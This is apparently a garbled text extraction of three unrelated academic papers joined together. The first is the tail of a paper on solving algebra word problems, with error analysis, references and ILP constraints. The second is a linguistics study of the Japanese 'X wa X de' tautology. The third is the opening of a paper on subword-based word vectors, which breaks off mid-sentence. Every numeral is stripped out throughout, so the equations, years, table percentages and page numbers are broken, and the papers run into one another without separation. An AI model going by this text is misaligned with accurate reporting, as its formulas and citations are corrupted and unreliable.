local classifier in predicting the cor- rect operator between two qsets and ablating feature sets. tion . ) on the task of predicting the correct op- erator for a pair of qsets 〈s ,s 〉 over the sin- gleeq dataset using a -fold cross validation. ta- ble shows the value of each feature group used in the local classifier, and thus the importance of details of the qset representation. . qualitative examples and error analysis. table shows some examples of problems solved by our method. we analyzed errors made by alges on the singleeq dataset. table summarizes five major categories of errors. problems and equations luke had stickers. he bought stickers from a store in the mall and got stickers for his birthday. then luke gave of the stickers to his sister and used to decorate a greeting card. how many stickers does luke have left? (( + (( + )− ))− ) = x maggie bought packs of red bouncy balls, packs of yellow bouncy balls, and packs of green bouncy balls. there were bouncy balls in each package. how many bouncy balls did maggie buy in all? x = ((( + ) + )∗ ) sam had dollars to spend on books. after buying them he had dollars. how much did each book cost? = (( ∗x) + ) fred loves trading cards. he bought packs of football cards for $ . each, a pack of pokemon cards for $ . , and a deck of baseball cards for $ . . how much did fred spend on cards? (( ∗ . ) + ( . + . )) = x table : examples of problems solved by alges to- gether with the returned equation. parsing errors cause a wrong grounding into the error type example parsing issues ( %) randy needs cupcakes for a birthday party. he already has chocolate cupcakes and vanilla cupcakes. how many more cup- cakes should randy buy? grounding & ordering ( %) there are bicycles and tricycles in the storage at danny’s apartment building. each bicycle has wheels and each tricycle has wheels. how many wheels are there in all? semantic limitation ( %) the sum of three consecutive even numbers is . what is the smallest of these numbers? lack of knowledge ( %) a restaurant sold hamburgers last week. how many hamburgers on average were sold each day? inferring quantities ( %) sara, keith, benny, and alyssa each have baseball cards. how many dozen baseball cards do they have in all? table : examples of different error categories and rel- ative frequencies. sources of errors are underlined. designed representation. for example, the parser treats ‘vanilla’ as a noun modified by the number ‘ ’, leading our system to treat ‘vanilla’ as the en- tity of a qset rather than ‘cupcake’. despite the improvements that come from alges, a portion of errors are attributed to grounding and ordering is- sues. for instance, the system fails to correctly dis- tinguish between the sets of wheels, and so does not get the movement-triggering container relationships right. semantic limitations are another source of er- rors. for example, alges does not model the se- mantics of ‘three consecutive numbers’. the fourth category refers to errors caused due to lack of world knowledge (e.g., ‘week’ corresponds to ‘ days’). finally, alges is not able to infer quantities when they are not explicitly mentioned in the text. for ex- ample, the number of people should be inferred by counting the proper names in the problem. conclusion in this work we have outlined a method for solv- ing grade school algebra word problems. we have empirically demonstrated the value of our approach versus state-of-the-art word problem solving tech- niques. our method grounds quantity references, utilizes type-consistency constraints to prune the search space, learns which algebraic operators are indicated by text, and ranks equations according to a global objective function. alges is a hybrid of pre- vious template-based and verb categorization state- based methods for solving such problems. by learn- ing correspondences between text and mathematical operators, we extend the method of state updates based on verb categories. by learning to re-rank equation trees using a global likelihood model, we extend the method of mapping word problems to equation templates. different components of alges can be adapted to other domains of language grounding that re- quire cross-sentence reasoning. future work in- volves extending alges to solve higher grade math word problems including simultaneous equations. this can be accomplished by extending the vari- able grounding step to allow multiple variables, and training the global equation model to recog- nize which quantities belong to which equation. the code and data for alges are publicly available. acknowledgments: this research was supported by the allen institute for ai ( - ), allen distinguished investigator award, and nsf (iis- ). we thank regina barzilay, luke zettle- moyer, aria haghighi, mark hopkins, ali farhadi, and the anonymous reviewers for their helpful com- ments. references yoav artzi and luke zettlemoyer. . weakly su- pervised learning of semantic parsers for mapping in- structions to actions. tacl, ( ): – . jonathan berant, vivek srikumar, pei-chun chen, abby vander linden, brittany harding, brad huang, peter clark, and christopher d. manning. . modeling biological processes for reading comprehen- sion. in emnlp. antoine bordes, nicolas usunier, and jason weston. . label ranking under ambiguous supervision for learning semantic correspondences. in icml, pages – . s. r. k. branavan, harr chen, luke zettlemoyer, and regina barzilay. . reinforcement learning for mapping instructions to actions. in acl/afnlp, pages – . chih-chung chang and chih-jen lin. . libsvm: a library for support vector machines. acm transac- tions on intelligent systems and technology, : : – : . david l. chen, joohyun kim, and raymond j. mooney. . training a multilingual sportscaster: using per- ceptual context to learn language. jair, : – . michael collins. . discriminative reranking for natural language parsing. computational linguistics, ( ): – . marie-catherine de marneffe, bill maccartney, christo- pher d manning, et al. . generating typed de- pendency parses from phrase structure parses. in pro- ceedings of lrec, volume , pages – . yansong feng and mirella lapata. . how many words is a picture worth? automatic caption generation for news images. in acl, pages – . ruifang ge and raymond j mooney. . a statisti- cal semantic parser that integrates syntax and seman- tics. in conference on computational natural lan- guage learning, pages – . ruifang ge and raymond j. mooney. . discrimina- tive reranking for semantic parsing. in acl. d. goldwasser and d. roth. . learning from natural instructions. in ijcai. hannaneh hajishirzi, julia hockenmaier, erik t. mueller, and eyal amir. . reasoning about robocup soccer narratives. in uai, pages – . hannaneh hajishirzi, mohammad rastegari, ali farhadi, and jessica k hodgins. . semantic understand- ing of professional soccer commentaries. in uai. ben hixon, peter clark, and hannaneh hajishirzi. . learning knowledge graphs for question answering through conversational dialog. in naacl. mohammad javad hosseini, hannaneh hajishirzi, oren etzioni, and nate kushman. . learning to solve arithmetic word problems with verb categorization. in emnlp, pages – . ibm ilog. . ibm ilog cplex optimization studio . . r koncel-kedziorski, hannaneh hajishirzi, and ali farhadi. . multi-resolution language grounding with weak supervision. in emnlp. nate kushman, yoav artzi, luke zettlemoyer, and regina barzilay. . learning to automatically solve algebra word problems. in acl, pages – . tom kwiatkowski, luke zettlemoyer, sharon goldwater, and mark steedman. . inducing probabilistic ccg grammars from logical form with higher-order unifica- tion. in emnlp, pages – . percy liang, michael i. jordan, and dan klein. . learning semantic correspondences with less supervi- sion. in acl/afnlp, pages – . dekang lin. . an information-theoretic definition of similarity. in icml, volume , pages – . fei liu, jeffrey flanigan, sam thomson, norman sadeh, and noah a. smith. . toward abstractive sum- marization using semantic representations. in naacl. cynthia matuszek, evan herbst, luke zettlemoyer, and dieter fox. . learning to parse natural lan- guage commands to a robot control system. in proc. of the th international symposium on experimental robotics (iser), june. arindam mitra and chitta baral. . learning to au- tomatically solve logic grid puzzles. in emnlp. d. roth and w. yih. . a linear programming formu- lation for global inference in natural language tasks. in hwee tou ng and ellen riloff, editors, conll, pages – . association for computational linguistics. subhro roy, urbana champaign, and dan roth. a. solving general arithmetic word problems. in emnlp. subhro roy, tim vieira, and dan roth. b. reason- ing about quantities in natural language. tacl. min joon seo, hannaneh hajishirzi, ali farhadi, and oren etzioni. . diagram understanding in ge- ometry questions. in aaai. minjoon seo, hannaneh hajishirzi, ali farhadi, oren et- zioni, and clint malcolm. . solving geometry problems: combining text and diagram interpretation. in emnlp. shuming shi, yuehui wang, chin-yew lin, xiaojiang liu, and yong rui. . automatically solving num- ber word problems by semantic parsing and reasoning. in emnlp. v. srikumar and d. roth. . a joint model for ex- tended semantic role labeling. in emnlp, edinburgh, scotland. mark yatskar, lucy vanderwende, and luke zettle- moyer. . see no evil, say no evil: description generation from densely labeled images. lexical and computational semantics (* sem ), page . john m zelle and raymond j mooney. . learn- ing to parse database queries using inductive logic pro- gramming. in aaai, pages – . luke s. zettlemoyer and michael collins. . learn- ing to map sentences to logical form: structured clas- sification with probabilistic categorial grammars. in uai, pages – . lipu zhou, shuaixiang dai, and liwei chen. . learn to solve algebra word problems using quadratic programming. in emnlp. appendix: ilp model details figure summarizes various constraints of our ilp model for generating candidate equations. op idxi is an auxilary variable whose value, when xi is an op- erator, is the index in the postfix expression of the first operand of xi. if op idxi = j, auxiliary vari- ables op xi ,op t i,op o i , and op u i mirror xj, tj,oj, and uj, respectively. se denotes the corresponding constant or operator symbol e (e.g., ‘+’, ‘=’, ‘ ’, etc.) in the postfix expression being constructed. h and w, as before, represent hard and weighted soft constraints. definitional constraints (h) : ci = i(xi ≤ k), i ∈ [l] oi = i(xi > n), i ∈ [l] ci + ui + oi = , i ∈ [l] d = ; di = di− − oi + , ≤ i ≤ l op idx i = max j≤i− {j | dj = di}, ≤ i ≤ l i(op idxi = j) ⇒ i(op x i = xj), i(op t i = tj), i(op oi = oj), i(op u i = uj), i, j ∈ [l] i(xi = j) ⇒ i(ti = typej), i ∈ [l], j ∈ [q] o = ; dl = , postfix validity (h) xl = m; xi < m, ≤ i < l, equation tree structure (h) i(xi = xj) ≤ oi, ≤ i < j < l, single use of constants (h) ci ⇒ i(xi < xj), ≤ i < j < l, perserve text ordering (w)∑ i∈l ui = , single unknown (h) type consistency (w) : i(xi ∈{s+, s−}) ⇒ i(ti = ti− = op ti), i ∈ [l] i(xi = s∗) ⇒ i(ti ∈{ti− , op ti}), i ∈ [l] i(xi = s/) ⇒ i(ti = op t i), i ∈ [l] i(xi ∈{s∗, s/}) ⇒ i(ti− = op ti), i ∈ [l] non-redundancy (h), symmetry breaking (h) : i(xi ∈{s+, s−}) ⇒ i(xi− = s , op xi = s ), i ∈ [l] i(xi = s/ ⇒ i(xi− ∈ {s , s }), i ∈ [l] i(xi ∈{s+, s−}, ci− = ci− = ) ⇒ i(xi− < xi− ), ≤ i ≤ l simplicity (h), equality/unknown first or last (w) : di ≤ maxstackdepth, i ∈ [l] op o l + ol− ,≤ ul− + i(u = ,∀i ∈{ , . . . , l− } : di ≥ ) ≥ equality next to unknown (w) : i(xi = s=) ≤ ui− + op ui , ≤ i ≤ l figure : ilp model for generating candidate equations paper title (use style: paper title) international conference on sensor network and computer engineering (icsnce ) semantic analysis of the wa tautology in subordinate clauses with minimal independence degree liu yu school of international studies jingdezhen ceramic institute jingdezhen, china e-mail: lredfish_ @ .com zhao junhuai school of foreign language tianjin university of science & technology tianjin, china e-mail: zjh_lx @hotmail.com abstract—japanese boasts a great variety of tautological expressions, by which these tautologies fall into three categories indicated by particles, namely, ハ(pronounced wa), ガ(pronounced ga) and モ(pronounced mo). some of which carry certain unusual semantic features when these tautologies are employed in clauses. this paper aims at analyzing the ハ (pronounced wa) tautology in subordinate clauses with minimal independence degree, and exploring the semantic properties of this category. keywords-tautological expression; dependent clauses; contrastive expression; analogical expression; category i. tautological expressions of ハ class in subordinate clause particle classification is used to classify tautological expressions in this paper, which is to take particle of tautological part as classify standard. tautological expressions of ハ class can be subclassified into four classes: ① ~x は x (だ) ② x は x (で)、y は y (だ) ③ x は x でも~ ④ x は x で~ this paper focuses on type ④ whose language form can be expressed as x は x で~[ ]. for this form, the first question is which part of its tautological expression belongs to. type ④ is similar to type ②, because the first half of type ② is also the form. but these two types are completely different. the following two examples can explain their differences from three aspects. ( ) 昔は昔、今は今。 ( ) 冬は冬で日本海側は汽車が豪雪で立ち往生し ているのに、太平洋側は空風が吹きまくる。 first, we can see that “で” of type ② is often omitted in daily dialogue. even if it is not omitted, we can know that X and X refer to the same noun. the superscript is the sequence of the noun in a sentence. if the number is unnecessary, x is used to represent the noun of the tautology part in this paper. “で” is middleton form of auxiliary verb “だ”, that is, it is an auxiliary verb. in example ( ) which represents type ④, there is usually no dayton after “ で ”. seeing from the sentence meaning, it is difficult to say that this “で” is an auxiliary verb and it should be taken as a case-particle. second, seeing from the sentence structure, the front part and the back part of type ② is called “等位節” or “並列節”, which is tied clause. however, in type ④, tautological part is obviously not tied clause or main clause, so it is a clause sentence. third, from the overall translation of the sentence, they are different. tautological expression will appear when type ② is translated into chinese or english, while type ④ will not. ( a)以前(过去)是以前(过去), 现在是现在。 ( b)the past is the past, today is today. ( a)冬天日本海那边火车因大雪而无法开动,太平洋 岸却猛刮干风。 ( b)when it comes to winter, trains get stuck in heavy snows along the coast of the japan sea when strong winds blow beside the pacific ocean. from the underlining parts of chinese and english translation of type ( ), it can be seen that type ② can be translated into tautological expression without any problems, while type ④ cannot. japanese clauses classification of minami( ) has been improved, this paper uses the classification of noda ( ). 従属句(独立度が一番低い)「~ながら」「~まま」 (付帯状況句)、「~て」(継起句)など 強い従属節(独立度が低い)「~と」「~たら」「~ ば」「~ても」時間節、連体修飾節など 弱い従属節(独立度が高い)「~から」「~のに」 「~し」「~けれど」「~が」など 引用節(独立度が一番高い)「~と」「~って」など it can be seen from the above classification, tautological part of type ④ only belongs to subordinate clause (従属句) which has the lowest degree of independence. “従属句” has no definite chinese translation. according to japanese linguistics, in a sentence, parts with “ながら” are called “従 mailto:redfish_ @ .com international conference on sensor network and computer engineering (icsnce ) 属 節 ” which is clause. in linguistics, there are two translations for “句” of japanese, which are “phrase” and “clause”. japanese grammar often uses it as the translation of the latter one, but “clause” also means “从句”. so this is a problem of unequal concept caused by the differences of languages. considering that there is less unit than phrase or clause in chinese, this paper takes“小句”as the translation of “従属句” (“词组” is also possible, but it is too unnatural). however, it should be noted that according to noda( ), in subordinate clause, neither “は” nor “が” can be used. from this point of view, only “x で” in type ④ can be called subordinate clause, so the later part of tautological express of type ④ is in subordinate clause, which is different from type ③. in type ③, the whole tautological expression is in subordinate clause. although there is half in subordinate clause, type ④ can be called “tautological expression in subordinate clause”. ii. first research of type ④ like type ③, the first research of type ④ is less. at first, it was carried out as a custom sentence by chen shengbao ( ) in advanced japanese for grade three of china. example ( ) in this paper is from this book. chen shengbao ( ) explains type ④ as 「冬は冬で」のように「名詞+は+同じ名詞+ で」という表現は、「冬は冬にふさわしい事情があ る」とか、「冬は冬の問題点を持っている」などの意 を表す。そして用言の場合だと、「続けば続いたで」 のように、「仮定表現+過去表現+で」というふうに 使われる。 in fact, type ④ is a more difficult to understand for japanese learners from china, because it is a meaningless repetition literally in the sentence as a whole for japanese learners from china. chen shengbao ( ) only superficially interprets example ( ). whether it is for the understanding of japanese learners or for the fundamental meaning of the meaning characteristics of type ④, it is not very inadequate. on the basis of reference of chen shengbao ( ), the author summarizes for japanese learners on type ④. XはXなりの事情・ 状況・ 方法・ 特性などがあ る。「はX で」という部分を「も」に換えても意味 はそれほど変わらない。 it was very important that “it can be replaced with particle “も”. it is useful for japanese learners to understand type ④, and it also reflects that type ④ has the nature of contrastive sentence. the nature of being similar to contrastive sentence is proved in グループ・ ジャマシイ ( ). according to グループ・ ジャマシイ( ): “「X はXで」と同じ名詞を繰り返し用いて、他のものと対 比しながらXについて述べるのに用いる。”by careful observation, it can be found that type ② (x は x (で) and y は y (だ)) is very similar to contrastive sentence in language form. but in the later discussion, it can be seen that they are not contrastive sentences. they should be called analogical sentences. the following example ( ) is a more complete example in language form. ( ) 夏は夏で溶けそうだ。冬は冬で眠い。 in this example, “summer” and “winter” are a pair of antonyms. the sentence is like a comparison between summer and winter. okamoto ( )( ) also gives some examples which are similar to example ( ), which takes type ④ as the sentence with the structure of the expression of contrast. ( ) 私があれほど憧れ、狙っている一流会社の一 流男。昼間は昼間で社内の女どものものすごい争奪戦 があり、夜は夜でホステスが鵜の目鷹の目。 ( ) 平日はもういつでもものすごく混んでるし、 ウィークエンドはウィークエンドでまたすごいの。 ( ) 男の子は、なんてたって末が楽しみですよ。 頼もしいものですよ。でも、娘は娘で可愛いものです ね。両方あるのが一番ですよ。 (the sentences of the three examples were written originally in roman letters and were translated into japanese for the convenience in this paper.) iii. the semantic properties of type ④ from the underlining parts of the above examples, it can be seen that there are a pair of antonyms or a pair of words which is similar to antonyms. this can be said to be a prerequisite or condition, only with this premise or condition, type ④ can be used. examples from グループ・ ジャマシ イ( ) all have this feature. ( ) 彼の言うことなど気にせず、君は君で自分が 正しいと思ったことをやればいいのだ。 ( ) 姉はオリンピックで金メダルを取り、妹は妹 で、初めて書いた小説が芥川賞を受賞した。 ( ) タヌキは若い女に化け、キツネはキツネで立 派な侍に変わった。 it seems that type ④ can be said to be an extension of type ②. in order to better highlight this association, example ( ) can be modified. ( a)夏は夏で、冬は冬だ。 ( b)夏は溶けそうだ。冬は眠い。 as shown in ( a), if the narrative part of the latter half is removed, example ( ) will immediately become type ②. and ( b) shows a similarity to type ③, that is, delete one of x, the sentence meaning roughly unchanged. this indicates that if tautological parts of tautology of ハ class of japanese is not the same part of the main clause, one x can be deleted to make japanese learners better understand its characteristics. x is only different from type ③. type ③ international conference on sensor network and computer engineering (icsnce ) achieves this effect by removing x , and type ④, by removing x . in addition, type ④ has an important feature that the parts of two pairs of terms x and y do not have to be symmetrical like example ( ), which is proved by examples ( )-( ). x and y even do not have to appear together. for example, ( ) (新しく開発されたソースをかけた料理につい て) 「おいしいんだろうけど、ソースはソースで食べ たい。」 but even if one of x or y does not appear, it does not mean there is no x or y. it is potential in another form. for example, x is “料理自体” in example ( ). in other words, it can be concluded that there must be a pair of things in type ④. according to the example of okamoto( ), compare it with the original sentence after deleting x , the argument can be proved. ( ) 野菜は野菜でここに置いて下さい。 ( a)野菜はここに置いて下さい。 ( a) is purely the expression of the meaning of the vegetables are here. the sentence is not about the following meanings, is there other things besides vegetables which will be put here? should the things be put here or there? ( ) is different. it has the following two meanings, such as “野菜 は野菜、野菜だけのグループにする” and”その野菜だ けのグループをここに置く”. in other words, ( ) is to have the meaning of the distinction or classification of things, which means ( ) must contain “ ほかの食材もある ”. therefore, in ( ), vegetables and other ingredients are indispensable. the follows are the most important feature of type ④, which is also the key basis that determines that it is not contractive sentence. back to the previous summary of a key feature of type ②, things represented by x and y of type ② must have one thing in common to make this pair of things belong to the same category at a deeper level. from this critical summary and the similarity of type ② and type ④, it is reasonable to deduce that type also has this characteristic. the key is how to demonstrate it. after example ( ), okamoto( ) changed the sentence into: ( ) *平日はもういつもものすごく混んでるけど、 ウィークエンドはウィークエンドでわりあいすいてい る。 okamoto ( ) makes this example a complete mistake by changing the narrative part of the “またすごいの” at the end of the sentence into “わりあいすいている”, which is the asterisk in front of the sentence means the sentence is completely wrong. similar to the opposite meaning of the narrative. okamoto ( ) regards the things represented by x and y of type ④ as two contrastive frames, treating the narrative part of the situation as a consequence, from example ( ) and ( ), it is deduced that the two frames of x and y will bring the same consequence, and if not, “x は x で” is not applicable. this common point is not that x and y have on literal meaning, it is the second half of the narrative part of the statement expressed. in addition to the above examples, there are more examples to support this. ( ) 輝己がときどき加わる夕飯の時間も、朋子に は楽しみだった。葡萄酒のことなら任せてくれ、とい う輝己の講釈を聞きながら、葡萄酒を飲み、食後は食 後で、輝己がアルコール分を炎にして抜いてくれたブ ランデーを嘗めた。(津島佑子 ) ( ) (権叔父に批判されて)本位田又八「やめたやめ たっ。やってられっかっ。俺は俺でやっていく!!おふ くろたちと一緒じゃいつまでたっても俺は又八のまま だ。俺は小次郎!佐々木小次郎だっ!!」(井上雄彦( ) 『バガボンド 』講談社) ( ) (トイレ中にアラレちゃんに吹っ飛ばされてた いへんに目にあった)則巻センベイ博士「ボクちゃん あんなハジかいたのうまれてはじめてだいっ!!こ、 このまえはこのまえで地球をわってしまうし!!」 (鳥山明( )『dr.スランプ 』集英社文庫 p ) all of the examples listed above in this paper clearly show the common points between x and y in the narrative of the second half. ( )( )夏と冬、両方とも人間に望ましくない状況。 ( )昼間と夜、両方とも女の激しい競争対象になっ ている。 ( )平日とウィークエンド、両方とも混雑している 状況。 ( )むすことむすめ、両方とも親にとって望ましい 側面を持つ。 ( )彼と君、両方とも自分が正しいと思っている意 見がある。 ( )姉と妹、両方ともある程度の成功を収めてい る。 ( )タヌキとキツネ、両方とも立派に人間の姿に化 けることができる。 ( )料理自体と料理に使うソース、両方ともおいし い。 ( )野菜とほかの食材、両方とも食材。 ( )食事中と食後、両方ともお酒を飲んだ。 ( )佐々木小次郎を装った又八と宮本武蔵、両方と も剣道修行を進んでいる。 ( )今回とこのまえ、両方ともアラレちゃんがひど いことをした。 international conference on sensor network and computer engineering (icsnce ) it can be seen, the things represented by x and y must have a common point which is also the necessary conditions of using type ④. however, okamoto ( ) used the term “contrast” for x and y, which is considered to be very inappropriate and needs to be specified. the concept of contrast (“対比表現”) is mentioned in many studies, however, there is not a clear definition. many times it is roughly used in the following examples. ( )野菜は好きだけど、肉は嫌いだ。 ( )北海道?夏だったら行きたいけど、冬は行きた くないね。 to analyze the contrastive sentence and tautological part of type ④, the clauses where x and y are must be divided into subject and narrative department. contrastive sentence and tautology of type ④ have the same place that x and y are opposite or relative. the key difference between type and contrastive sentence is the narrative part. like ( ) and ( ) which are contrastive sentences, linguistic meaning of the narrative part is opposite or relative. while the narrative of type ④ is similar, which is evident from the comparison of examples ( ) and ( ). comparison can be done of example ( ) and ( ). the narrative part of the former “お いしい”and “食べたい” can be seen to have the same meaning. if someone thinks something is delicious, it means he wants to eat it. it is not the same although there is both the meaning of “going” of the narrative parts in ( ). “going” is the meaning of the fragment, not the overall significance of narrative parts. therefore, type ④ is fundamentally different with the general contractive sentence. it is not appropriate to call it contrastive sentence. perhaps it can be called analogical sentence. analogy which is carried out by the narrative part makes type ④ have another important feature which is different from type ②. tautology of type ② is a kind of stress sentence. since the main analogical meaning parts are in narrative part, tautology of subject part of type ④ has no stress role. in other words, tautological expression of type ④ disappears. it only plays a sub-category of the subject matter of the sub-category role and the function completely disappears. finally, there is an extremely important intermediate transitional example that fully shows the relevance of type ④ and type ②. ( )ワムウ「なっ!なんの真似だ!?」 ジョジョ「おまえの首から出ている煙は爆発の煙 ではない!……それは「波紋傷」の煙だ!先に胸や脚 にくらった「波紋」はすでに全身に回っていたようだ な。おめーらにとって波紋がどんなに苦しいかはよく 知っている。もうなおすことはできねえが、 おれ の血でせめて痛みを和らげて死にな!」 ジョジョ「「まさかjojo ジョジョ きさま」と驚く」 ワムウ「まさかッ!jojo ジョジョ !きさま!」 ジョジョ「そうさ!ワムウ!戦いは戦いで別、シ ーザーの死の悲しみは悲しみで別……おれもなぜかあ んたに対して敬意をはらいたくなったのさ……この血 はあんたへの「敬意」なんだ……」(荒木飛呂彦( ) 『ジョジョの奇妙な冒険 』集英社文庫 p ) this example is almost identical in language to type ②. since there are other language components in tautological part, it belongs to type ④ from the perspective of sentence structure. it can be said that it is the intermediate transitional example of connection between the two types, which is relatively rare. iv. conclusion this paper makes a general analysis and summary of the characteristics to tautology (type ③), where tautological part is in clause. several key points can be summarized as follows. ) tautological part appears in subordinate clauses with minimal independence degree. only “x で ” is the subordinate clause. ) tautological part will not appear when translating into chinese or english. ) it is similar to the semantic properties of type ② characteristics in some parts. there are a group of things in pairs in the whole context, representing the subject of the type. the subject matter of things can be symmetrical or asymmetric in the form of language, one of which sometimes does not appear literally. ) being significantly different from type ②, its subject which is the tautological part does no longer have the tone of emphasis, but is functional as the auxiliary role of a sub-category of the subject matter. references [ ] グループ・ジャマシイ( )『教師と学習者のための日本語文 型辞典』くろしお出版 [ ] 野田尚史( )『「は」と「が」』くろしお出版 [ ] 南不二男( )『現代日本語の構造』大修館書店 [ ] chen shengbao, hu guowei, chen huahao ( ). japanese ( th volume of high school professional textbook of university of japanese). shanghai foreign language education press. [ ] zhai dongna, lin hong, pan jun. japanese linguistics. , higher education press. [ ] okamoto, shigeko, . nominal ‘tautologies’ in japanese: x wa x, x ga x, x mo x. proceedings of the th annual meeting of the berkeley linguistics society, - [ ] okamoto, shigeko, . nominal repetitive constructions in japanese: the ‘tautology’ controversy revisited. journal of pragmatics : - enriching word vectors with subword information piotr bojanowski∗ and edouard grave∗ and armand joulin and tomas mikolov facebook ai research {bojanowski,egrave,ajoulin,tmikolov}@fb.com abstract continuous word representations, trained on large unlabeled corpora are useful for many natural language processing tasks. popular models that learn such representations ignore the morphology of words, by assigning a dis- tinct vector to each word. this is a limitation, especially for languages with large vocabular- ies and many rare words. in this paper, we pro- pose a new approach based on the skipgram model, where each word is represented as a bag of character n-grams. a vector represen- tation is associated to each character n-gram; words being represented as the sum of these representations. our method is fast, allow- ing to train models on large corpora quickly and allows us to compute word representations for words that did not appear in the training data. we evaluate our word representations on nine different languages, both on word sim- ilarity and analogy tasks. by comparing to recently proposed morphological word repre- sentations, we show that our vectors achieve state-of-the-art performance on these tasks. introduction learning continuous representations of words has a long history in natural language processing (rumel- hart et al., ). these representations are typ- ically derived from large unlabeled corpora using co-occurrence statistics (deerwester et al., ; schütze, ; lund and burgess, ). a large body of work, known as distributional semantics, has studied the properties of these methods (turney ∗the two first authors contributed equally. et al., ; baroni and lenci, ). in the neural network community, collobert and weston ( ) proposed to learn word embeddings using a feed- forward neural network, by predicting a word based on the two words on the left and two words on the right. more recently, mikolov et al. ( b) pro- posed simple log-bilinear models to learn continu- ous representations of words on very large corpora efficiently. most of these techniques represent each word of the vocabulary by a distinct vector, without param- eter sharing. in particular, they ignore the internal structure of words, which is an important limitation for morphologically rich languages, such as turk- ish or finnish. for example, in french or spanish, most verbs have more than forty different inflected forms, while the finnish language has fifteen cases for nouns. these languages contain many word forms that occur rarely (or not at all) in the training corpus, making it difficult to learn good word rep- resentations. because many word formations follow rules, it is possible to improve vector representations for morphologically rich languages by using charac- ter level information. in this paper, we propose to learn representations for character n-grams, and to represent words as the sum of the n-gram vectors. our main contribution is to introduce an extension of the continuous skip- gram model (mikolov et al., b), which takes into account subword information. we evaluate this model on nine languages exhibiting different mor- phologies, showing the benefit of our approach. transactions of the association for computational linguistics, vol. , pp. – , . action editor: hinrich schütze. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. related work morphological word representations. in recent years, many methods have been proposed to incor- porate morphological information into word repre- sentations. to model rare words better, alexan- drescu and kirchhoff ( ) introduced factored neural language models, where words are repre- sented as sets of features. these features might in- clude morphological information, and this technique was succesfully applied to morphologically rich lan- guages, such as turkish (sak et al., ). re- cently, several works have proposed different com- position functions to derive representations of words from morphemes (lazaridou et al., ; luong et al., ; botha and blunsom, ; qiu et al., ). these different approaches rely on a morphological decomposition of words, while ours does not. similarly, chen et al. ( ) introduced a method to jointly learn embeddings for chinese words and characters. cui et al. ( ) proposed to constrain morphologically similar words to have similar representations. soricut and och ( ) described a method to learn vector representations of morphological transformations, allowing to ob- tain representations for unseen words by applying these rules. word representations trained on mor- phologically annotated data were introduced by cot- terell and schütze ( ). closest to our approach, schütze ( ) learned representations of character four-grams through singular value decomposition, and derived representations for words by summing the four-grams representations. very recently, wi- eting et al. ( ) also proposed to represent words using character n-gram count vectors. however, the objective function used to learn these representa- tions is based on paraphrase pairs, while our model can be trained on any text corpus. character level features for nlp. another area of research closely related to our work are character- level models for natural language processing. these models discard the segmentation into words and aim at learning language representations directly from characters. a first class of such models are recur- rent neural networks, applied to language model- ing (mikolov et al., ; sutskever et al., ; graves, ; bojanowski et al., ), text nor- malization (chrupała, ), part-of-speech tag- ging (ling et al., ) and parsing (ballesteros et al., ). another family of models are convolu- tional neural networks trained on characters, which were applied to part-of-speech tagging (dos san- tos and zadrozny, ), sentiment analysis (dos santos and gatti, ), text classification (zhang et al., ) and language modeling (kim et al., ). sperr et al. ( ) introduced a language model based on restricted boltzmann machines, in which words are encoded as a set of character n- grams. finally, recent works in machine translation have proposed using subword units to obtain repre- sentations of rare words (sennrich et al., ; lu- ong and manning, ). model in this section, we propose our model to learn word representations while taking into account morphol- ogy. we model morphology by considering subword units, and representing words by a sum of its charac- ter n-grams. we will begin by presenting the general framework that we use to train word vectors, then present our subword model and eventually describe how we handle the dictionary of character n-grams. . general model we start by briefly reviewing the continuous skip- gram model introduced by mikolov et al. ( b), from which our model is derived. given a word vo- cabulary of size w , where a word is identified by its index w ∈ { , ...,w}, the goal is to learn a vectorial representation for each word w. inspired by the distributional hypothesis (harris, ), word representations are trained to predict well words that appear in its context. more formally, given a large training corpus represented as a sequence of words w , ...,wt , the objective of the skipgram model is to maximize the following log-likelihood: t∑ t= ∑ c∈ct log p(wc | wt), where the context ct is the set of indices of words surrounding word wt. the probability of observing a context word wc given wt will be parameterized using the aforementioned word vectors. for now, let us consider that we are given a scoring function s which maps pairs of (word, context) to scores in r. one possible choice to define the probability of a context word is the softmax: p(wc | wt) = es(wt, wc) ∑w j= e s(wt, j) . however, such a model is not adapted to our case as it implies that, given a word wt, we only predict one context word wc. the problem of predicting context words can in- stead be framed as a set of independent binary clas- sification tasks. then the goal is to independently predict the presence (or absence) of context words. for the word at position t we consider all context words as positive examples and sample negatives at random from the dictionary. for a chosen context position c, using the binary logistic loss, we obtain the following negative log-likelihood: log ( + e−s(wt, wc) ) + ∑ n∈nt,c log ( + es(wt, n) ) , where nt,c is a set of negative examples sampled from the vocabulary. by denoting the logistic loss function ` : x → log( + e−x), we can re-write the objective as: t∑ t=   ∑ c∈ct `(s(wt, wc)) + ∑ n∈nt,c `(−s(wt, n))   . a natural parameterization for the scoring function s between a word wt and a context word wc is to use word vectors. let us define for each word w in the vocabulary two vectors uw and vw in rd. these two vectors are sometimes referred to as input and out- put vectors in the literature. in particular, we have vectors uwt and vwc , corresponding, respectively, to words wt and wc. then the score can be computed as the scalar product between word and context vec- tors as s(wt,wc) = u>wtvwc . the model described in this section is the skipgram model with negative sampling, introduced by mikolov et al. ( b). . subword model by using a distinct vector representation for each word, the skipgram model ignores the internal struc- ture of words. in this section, we propose a different scoring function s, in order to take into account this information. each word w is represented as a bag of character n-gram. we add special boundary symbols < and > at the beginning and end of words, allowing to dis- tinguish prefixes and suffixes from other character sequences. we also include the word w itself in the set of its n-grams, to learn a representation for each word (in addition to character n-grams). taking the word where and n = as an example, it will be represented by the character n-grams: <wh, whe, her, ere, re> and the special sequence <where>. note that the sequence <her>, corresponding to the word her is different from the tri-gram her from the word where. in practice, we extract all the n-grams for n greater or equal to and smaller or equal to . this is a very simple approach, and different sets of n-grams could be considered, for example taking all prefixes and suffixes. suppose that you are given a dictionary of n- grams of size g. given a word w, let us denote by gw ⊂ { , . . . ,g} the set of n-grams appearing in w. we associate a vector representation zg to each n-gram g. we represent a word by the sum of the vector representations of its n-grams. we thus ob- tain the scoring function: s(w,c) = ∑ g∈gw z>g vc. this simple model allows sharing the representa- tions across words, thus allowing to learn reliable representation for rare words. in order to bound the memory requirements of our model, we use a hashing function that maps n-grams to integers in to k. we hash character sequences using the fowler-noll-vo hashing function (specifi- cally the fnv- a variant). we set k = . be- low. ultimately, a word is represented by its index in the word dictionary and the set of hashed n-grams it contains. experimental setup . baseline in most experiments (except in sec. . ), we compare our model to the c implementation http://www.isthe.com/chongo/tech/comp/fnv of the skipgram and cbow models from the word vec package. . optimization we solve our optimization problem by perform- ing stochastic gradient descent on the negative log likelihood presented before. as in the 